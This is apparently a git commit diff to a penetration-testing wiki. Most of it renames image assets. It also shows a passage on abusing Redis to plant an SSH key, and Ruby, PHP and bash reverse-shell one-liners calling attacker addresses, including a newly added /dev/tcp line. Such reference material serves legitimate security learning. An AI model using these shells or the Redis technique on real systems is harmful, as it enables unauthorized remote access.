GitBook: [master] 5 pages and 12 assets modified

This commit is contained in:
CPol 2021-09-02 21:18:04 +00:00 committed by gitbook-bot
parent 2e4e5ffa55
commit 7aaa6bac6d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
11 changed files with 5 additions and 5 deletions

View file

Before

Width:  |  Height:  |  Size: 142 KiB

After

Width:  |  Height:  |  Size: 142 KiB

View file

Before

Width:  |  Height:  |  Size: 142 KiB

After

Width:  |  Height:  |  Size: 142 KiB

View file

Before

Width:  |  Height:  |  Size: 142 KiB

After

Width:  |  Height:  |  Size: 142 KiB

View file

Before

Width:  |  Height:  |  Size: 815 KiB

After

Width:  |  Height:  |  Size: 815 KiB

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

@ -58,7 +58,7 @@ This tool is also useful to get **other information analysed** from the packets
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**.
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
![](../../../.gitbook/assets/image%20%28567%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png)
### [BruteShark](https://github.com/odedshimon/BruteShark)

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation

View file

@ -129,8 +129,7 @@ OK
### SSH
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis.
In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`**
2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**

View file

@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png)
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29%20%282%29.png)
It means that the server **didn't receive the correct domain name** inside the Host header.
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.

View file

@ -103,6 +103,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java